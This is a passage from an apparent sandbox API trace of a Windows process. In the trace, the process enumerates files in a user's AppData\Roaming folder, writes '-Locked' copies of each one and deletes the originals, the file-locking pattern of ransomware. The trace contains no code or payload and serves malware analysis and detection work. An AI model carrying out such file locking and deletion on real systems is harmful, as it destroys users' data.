ftLastAccessTime.dwHighDateTime=0x1d7dc66, ftLastWriteTime.dwLowDateTime=0x7ba8e480, ftLastWriteTime.dwHighDateTime=0x1d7dc66, nFileSizeHigh=0x0, nFileSizeLow=0x16085, dwReserved0=0x0, dwReserved1=0x0, cFileName="sixqoI0m.xlsx", cAlternateFileName="SIXQOI~1.XLS")) returned 1 [0307.664] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc656eed0, ftCreationTime.dwHighDateTime=0x1d7df51, ftLastAccessTime.dwLowDateTime=0xb4b93410, ftLastAccessTime.dwHighDateTime=0x1d7e61f, ftLastWriteTime.dwLowDateTime=0xb4b93410, ftLastWriteTime.dwHighDateTime=0x1d7e61f, nFileSizeHigh=0x0, nFileSizeLow=0xda23, dwReserved0=0x0, dwReserved1=0x0, cFileName="v4hZ-TlKltopmm.mp4", cAlternateFileName="V4HZ-T~1.MP4")) returned 1 [0307.664] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69c00a20, ftCreationTime.dwHighDateTime=0x1d7dfca, ftLastAccessTime.dwLowDateTime=0xd6d5ecf0, ftLastAccessTime.dwHighDateTime=0x1d7e746, ftLastWriteTime.dwLowDateTime=0xd6d5ecf0, ftLastWriteTime.dwHighDateTime=0x1d7e746, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="yUlO-j d6_Ha.pps", cAlternateFileName="YULO-J~1.PPS")) returned 1 [0307.664] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d691b90, ftCreationTime.dwHighDateTime=0x1d7d7b9, ftLastAccessTime.dwLowDateTime=0x81695a80, ftLastAccessTime.dwHighDateTime=0x1d7de0f, ftLastWriteTime.dwLowDateTime=0x81695a80, ftLastWriteTime.dwHighDateTime=0x1d7de0f, nFileSizeHigh=0x0, nFileSizeLow=0x9b7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZSAFh.swf", cAlternateFileName="")) returned 1 [0307.665] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f1d70, ftCreationTime.dwHighDateTime=0x1d7da0a, ftLastAccessTime.dwLowDateTime=0xa2467cd0, ftLastAccessTime.dwHighDateTime=0x1d7dc28, ftLastWriteTime.dwLowDateTime=0xa2467cd0, ftLastWriteTime.dwHighDateTime=0x1d7dc28, nFileSizeHigh=0x0, nFileSizeLow=0x96de, dwReserved0=0x0, dwReserved1=0x0, cFileName="_KBh2MkVK-1OboakSPw0.mkv", cAlternateFileName="_KBH2M~1.MKV")) returned 1 [0307.665] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f1d70, ftCreationTime.dwHighDateTime=0x1d7da0a, ftLastAccessTime.dwLowDateTime=0xa2467cd0, ftLastAccessTime.dwHighDateTime=0x1d7dc28, ftLastWriteTime.dwLowDateTime=0xa2467cd0, ftLastWriteTime.dwHighDateTime=0x1d7dc28, nFileSizeHigh=0x0, nFileSizeLow=0x96de, dwReserved0=0x0, dwReserved1=0x0, cFileName="_KBh2MkVK-1OboakSPw0.mkv", cAlternateFileName="_KBH2M~1.MKV")) returned 0 [0307.665] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.665] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\0LklvNehR.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\0LklvNehR.docx-Locked", lpFilePart=0x0) returned 0x3b [0307.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.665] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\0LklvNehR.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\0lklvnehr.docx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0307.666] GetFileType (hFile=0x4a0) returned 0x1 [0307.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.666] GetFileType (hFile=0x4a0) returned 0x1 [0307.667] CloseHandle (hObject=0x4a0) returned 1 [0307.668] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\0LklvNehR.docx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\0LklvNehR.docx", lpFilePart=0x0) returned 0x34 [0307.668] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\0LklvNehR.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\0lklvnehr.docx")) returned 1 [0307.709] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4f1_b1f1MI-TC9ElavwZ.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4f1_b1f1MI-TC9ElavwZ.gif-Locked", lpFilePart=0x0) returned 0x45 [0307.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.709] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4f1_b1f1MI-TC9ElavwZ.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\4f1_b1f1mi-tc9elavwz.gif-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0307.710] GetFileType (hFile=0x4a0) returned 0x1 [0307.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.710] GetFileType (hFile=0x4a0) returned 0x1 [0307.711] CloseHandle (hObject=0x4a0) returned 1 [0307.771] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4f1_b1f1MI-TC9ElavwZ.gif", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4f1_b1f1MI-TC9ElavwZ.gif", lpFilePart=0x0) returned 0x3e [0307.771] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4f1_b1f1MI-TC9ElavwZ.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\4f1_b1f1mi-tc9elavwz.gif")) returned 1 [0307.778] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5OX_uRta.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5OX_uRta.avi-Locked", lpFilePart=0x0) returned 0x39 [0307.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.778] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5OX_uRta.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5ox_urta.avi-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0307.778] GetFileType (hFile=0x4a0) returned 0x1 [0307.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.779] GetFileType (hFile=0x4a0) returned 0x1 [0307.780] CloseHandle (hObject=0x4a0) returned 1 [0307.781] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5OX_uRta.avi", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5OX_uRta.avi", lpFilePart=0x0) returned 0x32 [0307.781] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5OX_uRta.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5ox_urta.avi")) returned 1 [0307.792] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8g0k0m8yj.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8g0k0m8yj.png-Locked", lpFilePart=0x0) returned 0x3a [0307.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.792] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8g0k0m8yj.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8g0k0m8yj.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0307.793] GetFileType (hFile=0x4a0) returned 0x1 [0307.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.793] GetFileType (hFile=0x4a0) returned 0x1 [0307.795] CloseHandle (hObject=0x4a0) returned 1 [0307.795] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8g0k0m8yj.png", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8g0k0m8yj.png", lpFilePart=0x0) returned 0x33 [0307.795] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8g0k0m8yj.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8g0k0m8yj.png")) returned 1 [0307.994] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ahc LlOV.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ahc LlOV.wav-Locked", lpFilePart=0x0) returned 0x39 [0307.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.995] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ahc LlOV.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ahc llov.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0307.997] GetFileType (hFile=0x4a0) returned 0x1 [0307.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.997] GetFileType (hFile=0x4a0) returned 0x1 [0308.000] CloseHandle (hObject=0x4a0) returned 1 [0308.000] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ahc LlOV.wav", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ahc LlOV.wav", lpFilePart=0x0) returned 0x32 [0308.000] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ahc LlOV.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ahc llov.wav")) returned 1 [0308.199] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\awN7g2jy-.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\awN7g2jy-.wav-Locked", lpFilePart=0x0) returned 0x3a [0308.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.200] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\awN7g2jy-.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\awn7g2jy-.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.200] GetFileType (hFile=0x4a0) returned 0x1 [0308.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.200] GetFileType (hFile=0x4a0) returned 0x1 [0308.203] CloseHandle (hObject=0x4a0) returned 1 [0308.203] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\awN7g2jy-.wav", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\awN7g2jy-.wav", lpFilePart=0x0) returned 0x33 [0308.203] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\awN7g2jy-.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\awn7g2jy-.wav")) returned 1 [0308.217] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B3G HOo r0SeaIBT.csv-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B3G HOo r0SeaIBT.csv-Locked", lpFilePart=0x0) returned 0x41 [0308.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.218] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B3G HOo r0SeaIBT.csv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\b3g hoo r0seaibt.csv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.218] GetFileType (hFile=0x4a0) returned 0x1 [0308.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.219] GetFileType (hFile=0x4a0) returned 0x1 [0308.220] CloseHandle (hObject=0x4a0) returned 1 [0308.221] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B3G HOo r0SeaIBT.csv", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B3G HOo r0SeaIBT.csv", lpFilePart=0x0) returned 0x3a [0308.221] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B3G HOo r0SeaIBT.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\b3g hoo r0seaibt.csv")) returned 1 [0308.232] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\EFaRQ41J5EALf7Lll.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\EFaRQ41J5EALf7Lll.mp3-Locked", lpFilePart=0x0) returned 0x42 [0308.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.232] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\EFaRQ41J5EALf7Lll.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\efarq41j5ealf7lll.mp3-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.233] GetFileType (hFile=0x4a0) returned 0x1 [0308.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.234] GetFileType (hFile=0x4a0) returned 0x1 [0308.235] CloseHandle (hObject=0x4a0) returned 1 [0308.236] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\EFaRQ41J5EALf7Lll.mp3", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\EFaRQ41J5EALf7Lll.mp3", lpFilePart=0x0) returned 0x3b [0308.236] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\EFaRQ41J5EALf7Lll.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\efarq41j5ealf7lll.mp3")) returned 1 [0308.258] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gyOdTm8Tl4T31VO3P9.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gyOdTm8Tl4T31VO3P9.wav-Locked", lpFilePart=0x0) returned 0x43 [0308.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.259] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gyOdTm8Tl4T31VO3P9.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\gyodtm8tl4t31vo3p9.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.259] GetFileType (hFile=0x4a0) returned 0x1 [0308.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.259] GetFileType (hFile=0x4a0) returned 0x1 [0308.261] CloseHandle (hObject=0x4a0) returned 1 [0308.262] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gyOdTm8Tl4T31VO3P9.wav", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gyOdTm8Tl4T31VO3P9.wav", lpFilePart=0x0) returned 0x3c [0308.262] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gyOdTm8Tl4T31VO3P9.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\gyodtm8tl4t31vo3p9.wav")) returned 1 [0308.325] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hVoaVxJ.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hVoaVxJ.mkv-Locked", lpFilePart=0x0) returned 0x38 [0308.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.326] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hVoaVxJ.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\hvoavxj.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.327] GetFileType (hFile=0x4a0) returned 0x1 [0308.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.327] GetFileType (hFile=0x4a0) returned 0x1 [0308.330] CloseHandle (hObject=0x4a0) returned 1 [0308.330] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hVoaVxJ.mkv", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hVoaVxJ.mkv", lpFilePart=0x0) returned 0x31 [0308.330] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hVoaVxJ.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\hvoavxj.mkv")) returned 1 [0308.391] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IiqLEvPwdtberm_hQtg.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IiqLEvPwdtberm_hQtg.gif-Locked", lpFilePart=0x0) returned 0x44 [0308.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.391] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IiqLEvPwdtberm_hQtg.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\iiqlevpwdtberm_hqtg.gif-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.392] GetFileType (hFile=0x4a0) returned 0x1 [0308.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.392] GetFileType (hFile=0x4a0) returned 0x1 [0308.394] CloseHandle (hObject=0x4a0) returned 1 [0308.394] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IiqLEvPwdtberm_hQtg.gif", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IiqLEvPwdtberm_hQtg.gif", lpFilePart=0x0) returned 0x3d [0308.394] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IiqLEvPwdtberm_hQtg.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\iiqlevpwdtberm_hqtg.gif")) returned 1 [0308.400] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JmKyzoGS.odp-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JmKyzoGS.odp-Locked", lpFilePart=0x0) returned 0x39 [0308.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.400] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JmKyzoGS.odp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jmkyzogs.odp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.401] GetFileType (hFile=0x4a0) returned 0x1 [0308.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.401] GetFileType (hFile=0x4a0) returned 0x1 [0308.404] CloseHandle (hObject=0x4a0) returned 1 [0308.404] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JmKyzoGS.odp", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JmKyzoGS.odp", lpFilePart=0x0) returned 0x32 [0308.404] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JmKyzoGS.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jmkyzogs.odp")) returned 1 [0308.409] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ku4SefOZNuFNZSBxX.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ku4SefOZNuFNZSBxX.mp3-Locked", lpFilePart=0x0) returned 0x42 [0308.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.409] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ku4SefOZNuFNZSBxX.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ku4sefoznufnzsbxx.mp3-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.410] GetFileType (hFile=0x4a0) returned 0x1 [0308.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.410] GetFileType (hFile=0x4a0) returned 0x1 [0308.415] CloseHandle (hObject=0x4a0) returned 1 [0308.416] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ku4SefOZNuFNZSBxX.mp3", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ku4SefOZNuFNZSBxX.mp3", lpFilePart=0x0) returned 0x3b [0308.416] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ku4SefOZNuFNZSBxX.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ku4sefoznufnzsbxx.mp3")) returned 1 [0308.467] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lT R.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lT R.mp4-Locked", lpFilePart=0x0) returned 0x35 [0308.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.467] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lT R.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\lt r.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.471] GetFileType (hFile=0x4a0) returned 0x1 [0308.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.471] GetFileType (hFile=0x4a0) returned 0x1 [0308.473] CloseHandle (hObject=0x4a0) returned 1 [0308.474] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lT R.mp4", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lT R.mp4", lpFilePart=0x0) returned 0x2e [0308.474] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lT R.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\lt r.mp4")) returned 1 [0308.537] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MlwZ3 5B.flv-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MlwZ3 5B.flv-Locked", lpFilePart=0x0) returned 0x39 [0308.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.537] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MlwZ3 5B.flv-Locked" (normalized: 